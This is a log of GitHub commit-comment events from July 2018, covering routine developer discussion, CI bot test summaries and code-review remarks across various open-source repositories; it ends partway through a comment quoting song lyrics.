{"id":"7966448697","type":"CommitCommentEvent","actor":{"login":"n00dles"},"repo":{"name":"GetSimpleCMS/GetSimpleCMS"},"payload":{"comment":{"id":29710711,"position":5,"line":170,"path":"admin/install.php","commit_id":"4b814a838be73f1da02856ba8ad30917362069c6","created_at":"2018-07-14T22:18:34Z","updated_at":"2018-07-14T22:18:34Z","author_association":"CONTRIBUTOR","body":"new install throws an error. status does not exist. \r\n"}},"created_at":"2018-07-14T22:18:34Z"}
{"id":"7966449757","type":"CommitCommentEvent","actor":{"login":"n00dles"},"repo":{"name":"GetSimpleCMS/GetSimpleCMS"},"payload":{"comment":{"id":29710715,"position":null,"line":null,"path":null,"commit_id":"4b814a838be73f1da02856ba8ad30917362069c6","created_at":"2018-07-14T22:19:38Z","updated_at":"2018-07-14T22:19:38Z","author_association":"CONTRIBUTOR","body":"its clickable one way at the moment. thought you might have missed it. but it makes sense, it looks like a cickable button , I'd expect to be able to click it. "}},"created_at":"2018-07-14T22:19:38Z"}
{"id":"7966450005","type":"CommitCommentEvent","actor":{"login":"tablatronix"},"repo":{"name":"GetSimpleCMS/GetSimpleCMS"},"payload":{"comment":{"id":29710716,"position":5,"line":170,"path":"admin/install.php","commit_id":"4b814a838be73f1da02856ba8ad30917362069c6","created_at":"2018-07-14T22:19:52Z","updated_at":"2018-07-14T22:19:52Z","author_association":"MEMBER","body":"Make sure this is not masking an actual bug"}},"created_at":"2018-07-14T22:19:52Z"}
{"id":"7966451943","type":"CommitCommentEvent","actor":{"login":"VladBusarev"},"repo":{"name":"github/scientist"},"payload":{"comment":{"id":29710717,"position":null,"line":null,"path":null,"commit_id":"dd838d96a1ebb844287b1f3917f564c46d982e3b","created_at":"2018-07-14T22:21:36Z","updated_at":"2018-07-14T22:21:36Z","author_association":"NONE","body":"it is not clear what is happening"}},"created_at":"2018-07-14T22:21:36Z"}
{"id":"7966453408","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/impactutils-feedstock"},"payload":{"comment":{"id":29710720,"position":null,"line":null,"path":null,"commit_id":"6dcd42f9c841543d7d8ea51ebd9faa31f1d4456f","created_at":"2018-07-14T22:22:51Z","updated_at":"2018-07-14T22:22:51Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @emthompson-usgs were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @emthompson-usgs were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-14T22:22:51Z"}
{"id":"7966453525","type":"CommitCommentEvent","actor":{"login":"Jacob731"},"repo":{"name":"mounicau/MSDA-Summer-Project"},"payload":{"comment":{"id":29710721,"position":5,"line":7,"path":"Data Preprocessing.Rmd","commit_id":"53d377506f4cfdcfd048a004776af5a4d0ae3d72","created_at":"2018-07-14T22:22:57Z","updated_at":"2018-07-14T22:22:57Z","author_association":"COLLABORATOR","body":"thanks i think it works"}},"created_at":"2018-07-14T22:22:57Z"}
{"id":"7966453781","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29710723,"position":null,"line":null,"path":null,"commit_id":"94be304ceee5365ec70db4364e1295c126f1bdca","created_at":"2018-07-14T22:23:12Z","updated_at":"2018-07-14T22:23:12Z","author_association":"MEMBER","body":":+1:"}},"created_at":"2018-07-14T22:23:12Z"}
{"id":"7966453846","type":"CommitCommentEvent","actor":{"login":"ian-luttrell"},"repo":{"name":"ian-luttrell/lamp-site"},"payload":{"comment":{"id":29710724,"position":null,"line":null,"path":null,"commit_id":"b3b60160e2c165a9f68b92a47eceddfc9096e4e2","created_at":"2018-07-14T22:23:15Z","updated_at":"2018-07-14T22:23:15Z","author_association":"OWNER","body":"In commit message, \r\n\r\n\"refactor CreateAccount::validateCredentials()\" \r\n\r\nshould be \r\n\r\n\"refactor CreateAccount::validateUsername() to CreateAccount::validateCredentials()\"."}},"created_at":"2018-07-14T22:23:15Z"}
{"id":"7966454113","type":"CommitCommentEvent","actor":{"login":"tablatronix"},"repo":{"name":"GetSimpleCMS/GetSimpleCMS"},"payload":{"comment":{"id":29710725,"position":null,"line":null,"path":null,"commit_id":"4b814a838be73f1da02856ba8ad30917362069c6","created_at":"2018-07-14T22:23:29Z","updated_at":"2018-07-14T22:23:29Z","author_association":"MEMBER","body":"I figured greyed out would be obvious, Guess not, I have to change these to even triggers for ajax, and I Didnt want people accidentally activating plugins if clicking titles, obviously it needs work. It was a fast addition with the sole purpose of making active plugins easier to see. I didn't want to invest that much into it. But if you think its confusing It might be best to leave it or uncomment that line that removes it entirely."}},"created_at":"2018-07-14T22:23:29Z"}
{"id":"7966459666","type":"CommitCommentEvent","actor":{"login":"tablatronix"},"repo":{"name":"GetSimpleCMS/GetSimpleCMS"},"payload":{"comment":{"id":29710736,"position":5,"line":170,"path":"admin/install.php","commit_id":"4b814a838be73f1da02856ba8ad30917362069c6","created_at":"2018-07-14T22:28:56Z","updated_at":"2018-07-14T22:28:56Z","author_association":"MEMBER","body":"Gotcha thanks, I will check why and see if it needs to be addressed."}},"created_at":"2018-07-14T22:28:56Z"}
{"id":"7966460887","type":"CommitCommentEvent","actor":{"login":"mistakia"},"repo":{"name":"orbitdb/ipfs-log"},"payload":{"comment":{"id":29710738,"position":82,"line":82,"path":"examples/browser/loader-visualization.html","commit_id":"b7acb426d2b546ef747af2de5fe75efefcb8a0c0","created_at":"2018-07-14T22:30:11Z","updated_at":"2018-07-14T22:30:11Z","author_association":"NONE","body":"`lib/ipfs/index.min.js` is missing?"}},"created_at":"2018-07-14T22:30:11Z"}
{"id":"7966462485","type":"CommitCommentEvent","actor":{"login":"venturachrisdev"},"repo":{"name":"miguelangel298/Api-nodejs"},"payload":{"comment":{"id":29710743,"position":null,"line":null,"path":null,"commit_id":"83d4619b026ea633d55d49ddf7cb136d30a891c4","created_at":"2018-07-14T22:31:30Z","updated_at":"2018-07-14T22:31:30Z","author_association":"NONE","body":"Looks good to me"}},"created_at":"2018-07-14T22:31:30Z"}
{"id":"7966463073","type":"CommitCommentEvent","actor":{"login":"garth-wells"},"repo":{"name":"FEniCS/dolfinx"},"payload":{"comment":{"id":29710745,"position":8,"line":53,"path":"cpp/dolfin/io/XDMFFile.cpp","commit_id":"9690c078cfc749879c764e41b5709df1ad45f228","created_at":"2018-07-14T22:32:06Z","updated_at":"2018-07-14T22:32:06Z","author_association":"MEMBER","body":"`if` clause is more than one line -> need curly braces for readability."}},"created_at":"2018-07-14T22:32:06Z"}
{"id":"7966464117","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710748,"position":null,"line":null,"path":null,"commit_id":"a8a6b30241eb3322ff14c56ac5a4320870ac4e6e","created_at":"2018-07-14T22:33:07Z","updated_at":"2018-07-14T22:33:07Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (RKStrand) - x86_64-MacOS-10.9-clang: Tests Failed (2593 of 2941 tests passed, 79 test warnings)\n\nMessages:\n\n * 424 tests had: EIO diffs.\n * 284 tests had: ESO big diffs.\n * 135 tests had: ESO small diffs.\n * 135 tests had: Table small diffs.\n * 127 tests had: SSZ small diffs.\n * 86 tests had: ZSZ small diffs.\n * 264 tests had: Table big diffs.\n * 8 tests had: AUD diffs.\n * 101 tests had: ZSZ big diffs.\n * 37 tests had: ERR diffs.\n * 13 tests had: SSZ big diffs.\n * 44 tests had: MTR small diffs.\n * 50 tests had: MTR big diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 650\n * Failed: 1\n\nregression Test Summary\n * Passed: 276\n * Failed: 347\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8a6b30241eb3322ff14c56ac5a4320870ac4e6e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8a6b30241eb3322ff14c56ac5a4320870ac4e6e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.17%25-red.png)</a> \n"}},"created_at":"2018-07-14T22:33:07Z"}
{"id":"7966467429","type":"CommitCommentEvent","actor":{"login":"michalhabera"},"repo":{"name":"FEniCS/dolfinx"},"payload":{"comment":{"id":29710752,"position":8,"line":53,"path":"cpp/dolfin/io/XDMFFile.cpp","commit_id":"9690c078cfc749879c764e41b5709df1ad45f228","created_at":"2018-07-14T22:36:20Z","updated_at":"2018-07-14T22:36:20Z","author_association":"CONTRIBUTOR","body":"Ok, thanks, I will correct it. Now I am still figuring out some random test hangings in parallel... very difficult to debug. "}},"created_at":"2018-07-14T22:36:20Z"}
{"id":"7966467829","type":"CommitCommentEvent","actor":{"login":"Bolth"},"repo":{"name":"spring-cloud/spring-cloud-gcp"},"payload":{"comment":{"id":29710753,"position":7,"line":7,"path":"spring-cloud-gcp-storage/src/test/resources/logback-test.xml","commit_id":"4ba0a831f1b9119c21664242241e766fa1f16c07","created_at":"2018-07-14T22:36:44Z","updated_at":"2018-07-14T22:36:44Z","author_association":"NONE","body":"123av"}},"created_at":"2018-07-14T22:36:44Z"}
{"id":"7966468164","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710755,"position":null,"line":null,"path":null,"commit_id":"ea744ee28374298283a237e23a9837d667abe50a","created_at":"2018-07-14T22:37:05Z","updated_at":"2018-07-14T22:37:05Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2975 of 2975 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea744ee28374298283a237e23a9837d667abe50a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea744ee28374298283a237e23a9837d667abe50a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T22:37:05Z"}
{"id":"7966468796","type":"CommitCommentEvent","actor":{"login":"n00dles"},"repo":{"name":"GetSimpleCMS/GetSimpleCMS"},"payload":{"comment":{"id":29710756,"position":5,"line":170,"path":"admin/install.php","commit_id":"4b814a838be73f1da02856ba8ad30917362069c6","created_at":"2018-07-14T22:37:44Z","updated_at":"2018-07-14T22:37:44Z","author_association":"CONTRIBUTOR","body":"Tried a new install on laptop and the error not showing. so I removed this 'fix' . might have been a communication error to get the latest version on my main dev machine. "}},"created_at":"2018-07-14T22:37:44Z"}
{"id":"7966470999","type":"CommitCommentEvent","actor":{"login":"ColasRi"},"repo":{"name":"giacomov/hawc_hal"},"payload":{"comment":{"id":29710761,"position":null,"line":null,"path":null,"commit_id":"d68f1efc18666c1485f8e5ac91a91a039b8cd188","created_at":"2018-07-14T22:39:58Z","updated_at":"2018-07-14T22:39:58Z","author_association":"CONTRIBUTOR","body":"I did test the colorbar already:\r\nhttps://github.com/giacomov/hawc_hal/commit/430449da375eea0e39807a6c74c5193165018fd8#diff-484462fced51d1a06b1d93b4a44dd535R63"}},"created_at":"2018-07-14T22:39:58Z"}
{"id":"7966472223","type":"CommitCommentEvent","actor":{"login":"SandraGunawanA1"},"repo":{"name":"SandraGunawanA1/cheat.sh"},"payload":{"comment":{"id":29710765,"position":null,"line":null,"path":null,"commit_id":"0f4da8f35e95a7d805752d95d3d52b08184b8115","created_at":"2018-07-14T22:41:08Z","updated_at":"2018-07-14T22:41:08Z","author_association":"OWNER","body":"0f4da8f35e95a7d805752d95d3d52b08184b8115"}},"created_at":"2018-07-14T22:41:08Z"}
{"id":"7966473022","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710767,"position":null,"line":null,"path":null,"commit_id":"ea744ee28374298283a237e23a9837d667abe50a","created_at":"2018-07-14T22:41:57Z","updated_at":"2018-07-14T22:41:57Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea744ee28374298283a237e23a9837d667abe50a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T22:41:57Z"}
{"id":"7966474304","type":"CommitCommentEvent","actor":{"login":"smarterclayton"},"repo":{"name":"openshift/ci-operator"},"payload":{"comment":{"id":29710768,"position":10,"line":285,"path":"pkg/api/types.go","commit_id":"43ee594ac4b93fbcdd3780243ff630c83e86ac14","created_at":"2018-07-14T22:43:16Z","updated_at":"2018-07-14T22:43:16Z","author_association":"MEMBER","body":"This seems like it would be better modeled as an env var to the test.\r\n\r\nHowever, the point of tests within ci-operator are to be hermetic.  I don’t think tests within ci-operator should be allowed to access the docker socket, but instead be defined as an external template."}},"created_at":"2018-07-14T22:43:16Z"}
{"id":"7966475464","type":"CommitCommentEvent","actor":{"login":"sixtyfive"},"repo":{"name":"surayt/wordcabin"},"payload":{"comment":{"id":29710769,"position":null,"line":null,"path":null,"commit_id":"fd166e43b53563b07901f7e7a67c784cf2cf9644","created_at":"2018-07-14T22:44:29Z","updated_at":"2018-07-14T22:44:29Z","author_association":"CONTRIBUTOR","body":"And in need of help as there's some stuff I can't figure how out to do ;-)"}},"created_at":"2018-07-14T22:44:29Z"}
{"id":"7966475698","type":"CommitCommentEvent","actor":{"login":"smarterclayton"},"repo":{"name":"openshift/ci-operator"},"payload":{"comment":{"id":29710770,"position":24,"line":358,"path":"pkg/api/types.go","commit_id":"224fac486b0fce056df842a31df5c4c6028649ad","created_at":"2018-07-14T22:44:45Z","updated_at":"2018-07-14T22:44:45Z","author_association":"MEMBER","body":"I don’t want to add complex flows to ci-operator.  What is this trying to block?  Promotion?  All tests have to pass for promotion to succeed anyway, including those referenced by templates."}},"created_at":"2018-07-14T22:44:45Z"}
{"id":"7966477656","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":29710775,"position":null,"line":null,"path":null,"commit_id":"14ae8b052252e4a3073429e4a945e471f0079dc6","created_at":"2018-07-14T22:46:35Z","updated_at":"2018-07-14T22:46:35Z","author_association":"NONE","body":"@omor1 @noobpwnftw @snicolet \r\nJust a curious question about the cluster branch... Has there ever been any test showing that say a cluster of 2 machines w/ N cores each(2N total) if stronger than just a single machine w/ N cores?   Or any kind of elo measurement?"}},"created_at":"2018-07-14T22:46:35Z"}
{"id":"7966478207","type":"CommitCommentEvent","actor":{"login":"bitbd83"},"repo":{"name":"karachain/DEx"},"payload":{"comment":{"id":29710776,"position":null,"line":null,"path":null,"commit_id":"e5895994364ddf9a3c1a4574326268b19e3c2341","created_at":"2018-07-14T22:47:11Z","updated_at":"2018-07-14T22:47:11Z","author_association":"NONE","body":"I want to build a copy. Forking this one."}},"created_at":"2018-07-14T22:47:11Z"}
{"id":"7966479496","type":"CommitCommentEvent","actor":{"login":"Chrisnake"},"repo":{"name":"Chrisnake/S1-AccessPointManager"},"payload":{"comment":{"id":29710780,"position":62,"line":69,"path":"UAPManager/src/driver.java","commit_id":"0b979097dbf3f100a59ce9a84e1241000d6f205b","created_at":"2018-07-14T22:48:26Z","updated_at":"2018-07-14T22:48:26Z","author_association":"OWNER","body":"checkLogin code when user types in their password and ID."}},"created_at":"2018-07-14T22:48:26Z"}
{"id":"7966479751","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710781,"position":null,"line":null,"path":null,"commit_id":"f33044c2517086b75e3eee4d97a9779e98c71921","created_at":"2018-07-14T22:48:43Z","updated_at":"2018-07-14T22:48:43Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (RKStrand) - Win64-Windows-7-VisualStudio-14: Tests Failed (2591 of 2941 tests passed, 80 test warnings)\n\nMessages:\n\n * 427 tests had: EIO diffs.\n * 285 tests had: ESO big diffs.\n * 136 tests had: ESO small diffs.\n * 135 tests had: Table small diffs.\n * 125 tests had: SSZ small diffs.\n * 86 tests had: ZSZ small diffs.\n * 266 tests had: Table big diffs.\n * 11 tests had: AUD diffs.\n * 101 tests had: ZSZ big diffs.\n * 36 tests had: ERR diffs.\n * 15 tests had: SSZ big diffs.\n * 44 tests had: MTR small diffs.\n * 51 tests had: MTR big diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 650\n * Failed: 1\n\nregression Test Summary\n * Passed: 274\n * Failed: 349\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f33044c2517086b75e3eee4d97a9779e98c71921-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f33044c2517086b75e3eee4d97a9779e98c71921-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.1%25-red.png)</a> \n"}},"created_at":"2018-07-14T22:48:43Z"}
{"id":"7966482600","type":"CommitCommentEvent","actor":{"login":"n00dles"},"repo":{"name":"GetSimpleCMS/GetSimpleCMS"},"payload":{"comment":{"id":29710784,"position":null,"line":null,"path":null,"commit_id":"4b814a838be73f1da02856ba8ad30917362069c6","created_at":"2018-07-14T22:51:44Z","updated_at":"2018-07-14T22:51:44Z","author_association":"CONTRIBUTOR","body":"maybe just a red/green icon instead on the slide button as instinct makes you think its clickable. "}},"created_at":"2018-07-14T22:51:44Z"}
{"id":"7966482618","type":"CommitCommentEvent","actor":{"login":"giacomov"},"repo":{"name":"giacomov/hawc_hal"},"payload":{"comment":{"id":29710785,"position":null,"line":null,"path":null,"commit_id":"d68f1efc18666c1485f8e5ac91a91a039b8cd188","created_at":"2018-07-14T22:51:45Z","updated_at":"2018-07-14T22:51:45Z","author_association":"OWNER","body":"I know 😉 in the \"complete analysis\" test I wanted to test that as well, because when I am developing that's what I use for a quick turnaround. It doesn't hurt to test twice"}},"created_at":"2018-07-14T22:51:45Z"}
{"id":"7966482736","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29710786,"position":null,"line":null,"path":null,"commit_id":"96f83e40c81aef0cf0584c88757ed6b0367a1c24","created_at":"2018-07-14T22:51:54Z","updated_at":"2018-07-14T22:51:54Z","author_association":"MEMBER","body":"If you perform merges, please keep the commit message generated by git. I was quite confused seeing your commit show up twice until I realized that this is a merge commit.\r\n\r\nGenerally though, please try to avoid merging into php-src, outside of the up-merges of PHP-7.1 -> PHP-7.2 -> master. `git rebase` can be used to retarget an older patch to master."}},"created_at":"2018-07-14T22:51:54Z"}
{"id":"7966484715","type":"CommitCommentEvent","actor":{"login":"KJP12"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29710787,"position":null,"line":null,"path":null,"commit_id":"35c7c978070c8368c4ceab5cb0f8776ddf268ac1","created_at":"2018-07-14T22:54:04Z","updated_at":"2018-07-14T22:54:04Z","author_association":"NONE","body":"*uses the function regardless*"}},"created_at":"2018-07-14T22:54:04Z"}
{"id":"7966485081","type":"CommitCommentEvent","actor":{"login":"n00dles"},"repo":{"name":"GetSimpleCMS/GetSimpleCMS"},"payload":{"comment":{"id":29710788,"position":null,"line":null,"path":null,"commit_id":"4b814a838be73f1da02856ba8ad30917362069c6","created_at":"2018-07-14T22:54:25Z","updated_at":"2018-07-14T22:54:25Z","author_association":"CONTRIBUTOR","body":"or you could have 2 lists. enabled plugins on top and a second list below with disabled plugins... "}},"created_at":"2018-07-14T22:54:25Z"}
{"id":"7966485346","type":"CommitCommentEvent","actor":{"login":"tablatronix"},"repo":{"name":"GetSimpleCMS/GetSimpleCMS"},"payload":{"comment":{"id":29710789,"position":5,"line":170,"path":"admin/install.php","commit_id":"4b814a838be73f1da02856ba8ad30917362069c6","created_at":"2018-07-14T22:54:43Z","updated_at":"2018-07-14T22:54:43Z","author_association":"MEMBER","body":"There is a bug in ver checking that I have not been able to find so this might be it.\r\n"}},"created_at":"2018-07-14T22:54:43Z"}
{"id":"7966485904","type":"CommitCommentEvent","actor":{"login":"tablatronix"},"repo":{"name":"GetSimpleCMS/GetSimpleCMS"},"payload":{"comment":{"id":29710790,"position":null,"line":null,"path":null,"commit_id":"4b814a838be73f1da02856ba8ad30917362069c6","created_at":"2018-07-14T22:55:15Z","updated_at":"2018-07-14T22:55:15Z","author_association":"MEMBER","body":"too much work atm"}},"created_at":"2018-07-14T22:55:15Z"}
{"id":"7966490932","type":"CommitCommentEvent","actor":{"login":"tomschenkjr"},"repo":{"name":"Chicago/predicting-e-coli-concentrations"},"payload":{"comment":{"id":29710796,"position":67,"line":190,"path":"predicting-e-coli-concentrations.Rmd","commit_id":"05c6ba2a059a226bbeeb34f0147f813a42ba36eb","created_at":"2018-07-14T23:00:07Z","updated_at":"2018-07-14T23:00:07Z","author_association":"MEMBER","body":"@nicklucius - can you double-check the 7 and 11.9 percent number in this line. I'm looking at Table 2 and the 2015 Prior-day and 2016 Prior-day were 3.7 3.2 and 3.7 percent, respectively."}},"created_at":"2018-07-14T23:00:07Z"}
{"id":"7966498492","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":29710801,"position":null,"line":null,"path":null,"commit_id":"14ae8b052252e4a3073429e4a945e471f0079dc6","created_at":"2018-07-14T23:07:15Z","updated_at":"2018-07-14T23:07:15Z","author_association":"NONE","body":"There haven't been any formal test yet, however from a few games one could expect a less than 2:1(4 MPI nodes < 2 local cores) effectiveness in scaling."}},"created_at":"2018-07-14T23:07:15Z"}
{"id":"7966500118","type":"CommitCommentEvent","actor":{"login":"acabaca"},"repo":{"name":"acabaca/XXX-"},"payload":{"comment":{"id":29710803,"position":1,"line":1,"path":"README.md","commit_id":"b4b64882709a13112f85ae04a3c6894fad1506dc","created_at":"2018-07-14T23:08:51Z","updated_at":"2018-07-14T23:08:51Z","author_association":"OWNER","body":"![5ff19b93eb8bb3d8d19b9b0eabdff6c8](https://user-images.githubusercontent.com/36794065/42729039-5f466056-87dc-11e8-9d37-c5a22e5c5bc3.jpg)\r\n"}},"created_at":"2018-07-14T23:08:51Z"}
{"id":"7966503831","type":"CommitCommentEvent","actor":{"login":"RedSparr0w"},"repo":{"name":"gibaBR/XCI-Organizer"},"payload":{"comment":{"id":29710806,"position":null,"line":null,"path":null,"commit_id":"426f5844f022659de648494e64fd07a063b6ecc1","created_at":"2018-07-14T23:12:33Z","updated_at":"2018-07-14T23:12:33Z","author_association":"NONE","body":"I'm probably missing the point but why does the file path need to be encoded?"}},"created_at":"2018-07-14T23:12:33Z"}
{"id":"7966505094","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710807,"position":null,"line":null,"path":null,"commit_id":"ea744ee28374298283a237e23a9837d667abe50a","created_at":"2018-07-14T23:13:52Z","updated_at":"2018-07-14T23:13:52Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1687 of 1687 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea744ee28374298283a237e23a9837d667abe50a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea744ee28374298283a237e23a9837d667abe50a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea744ee28374298283a237e23a9837d667abe50a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-14T23:13:52Z"}
{"id":"7966507858","type":"CommitCommentEvent","actor":{"login":"nicklucius"},"repo":{"name":"Chicago/predicting-e-coli-concentrations"},"payload":{"comment":{"id":29710812,"position":67,"line":190,"path":"predicting-e-coli-concentrations.Rmd","commit_id":"05c6ba2a059a226bbeeb34f0147f813a42ba36eb","created_at":"2018-07-14T23:16:35Z","updated_at":"2018-07-14T23:16:35Z","author_association":"CONTRIBUTOR","body":"Yes this was changed because at this point in the paper, the performance on all beaches is calculated. Later in the paper, the performance is calculated for the same 15 beaches that the hybrid model predicts, for an apples-to-apples comparison. These numbers are accurate for all 20 beaches.\n\nNick Lucius\nData Scientist\nAdvanced Analytics\nDepartment of Innovation and Technology\nCity of Chicago\n(312) 744-5339\nnicholas.lucius2@cityofchicago.org | data.cityofchicago.org | dev.cityofchicago.org | digital.cityofchicago.org\n________________________________\nFrom: Tom Schenk Jr <notifications@github.com>\nSent: Saturday, July 14, 2018 6:00:07 PM\nTo: Chicago/predicting-e-coli-concentrations\nCc: Nicholas Lucius; Mention\nSubject: Re: [Chicago/predicting-e-coli-concentrations] Grammer and style changes, resolves #64 (05c6ba2)\n\n\n@nicklucius<https://github.com/nicklucius> - can you double-check the 7 and 11.9 percent number in this line. I'm looking at Table 2 and the 2015 Prior-day and 2016 Prior-day were 3.7 3.2 and 3.7 percent, respectively.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub<https://github.com/Chicago/predicting-e-coli-concentrations/commit/05c6ba2a059a226bbeeb34f0147f813a42ba36eb#commitcomment-29710796>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AQEqMzaIOqDIxVWFAxdwGv4B-SvzAD9Xks5uGnf3gaJpZM4VQC2V>.\n\n\n________________________________\nThis e-mail, and any attachments thereto, is intended only for use by the addressee(s) named herein and may contain legally privileged and/or confidential information. If you are not the intended recipient of this e-mail (or the person responsible for delivering this document to the intended recipient), you are hereby notified that any dissemination, distribution, printing or copying of this e-mail, and any attachment thereto, is strictly prohibited. If you have received this e-mail in error, please respond to the individual sending the message, and permanently delete the original and any copy of any e-mail and printout thereof.\n"}},"created_at":"2018-07-14T23:16:35Z"}
{"id":"7966508688","type":"CommitCommentEvent","actor":{"login":"attuska"},"repo":{"name":"uhulinux/ub-ubk3"},"payload":{"comment":{"id":29710814,"position":null,"line":null,"path":null,"commit_id":"9f4b00876dbbe22c9e1d982593697cd7be94f1c5","created_at":"2018-07-14T23:17:24Z","updated_at":"2018-07-14T23:17:24Z","author_association":"CONTRIBUTOR","body":"Szépen lefordul, csak ez még biztosan nem elég. Használhtóvá is kell majd tenni.\r\n"}},"created_at":"2018-07-14T23:17:24Z"}
{"id":"7966509085","type":"CommitCommentEvent","actor":{"login":"BoneyIsSpooky"},"repo":{"name":"Mysterypotatoguy/Javacord"},"payload":{"comment":{"id":29710815,"position":null,"line":null,"path":null,"commit_id":"5306a8a57521bb5ca423ec6489eda3c1020c347c","created_at":"2018-07-14T23:17:51Z","updated_at":"2018-07-14T23:17:51Z","author_association":"NONE","body":"MOSKAU - FREMD UND GEHEIMNISVOLL,\r\nTÜRME AUS ROTEM GOLD,\r\nKALT WIE DAS EIS.\r\n\r\nMOSKAU - DOCH WER DICH WIRKLICH KENNT,\r\nDER WEISS, EIN FEUER BRENNT\r\nIN DIR SO HEISS.\r\n\r\nKOSAKEN HEY, HEY, HEY LEERT DIE GLÄSER!\r\nNATASCHA HA,HA, HA, DU BIST SCHÖN!\r\nTOWARISCH HEY, HEY, HEY, AUF DAS LEBEN!\r\nAUF DEIN WOHL BRUDER, HEY BRUDER HO!\r\n\r\nMOSKAU, MOSKAU\r\nWIRF DIE GLÄSER AN DIE WAND,\r\nRUSSLAND IST EIN SCHÖNES LAND, HO, HO, HO, HO, HEY!\r\n\r\nMOSKAU, MOSKAU,\r\nDEINE SEELE IST SO GROSS,\r\nNACHTS DA IST DER TEUFEL LOS, HA, HA, HA, HA, HEY!\r\n\r\nMOSKAU, MOSKAU,\r\nLIEBE SCHMECKT WIE KAVIAR,\r\nMÄDCHEN SIND ZUM KÜSSEN DA, HO, HO, HO, HO, HEY!\r\n\r\nMOSKAU, MOSKAU\r\nKOMM WIR TANZEN AUF DEM TISCH,\r\nBIS DER TISCH ZUSAMMENBRICHT, HA, HA, HA, HA, HA!\r\n\r\nMOSKAU\r\nTOR ZUR VERGANGENHEIT\r\nSPIEGEL DER ZARENZEIT\r\nROT WIE DAS BLUT\r\n\r\nMOSKAU\r\nWER DEINE SEELE KENNT\r\nDER WEISS DIE LIEBE BRENNT\r\nHEISS WIE DIE GLUT\r\n\r\nKOSAKEN HEY, HEY, HEY LEERT 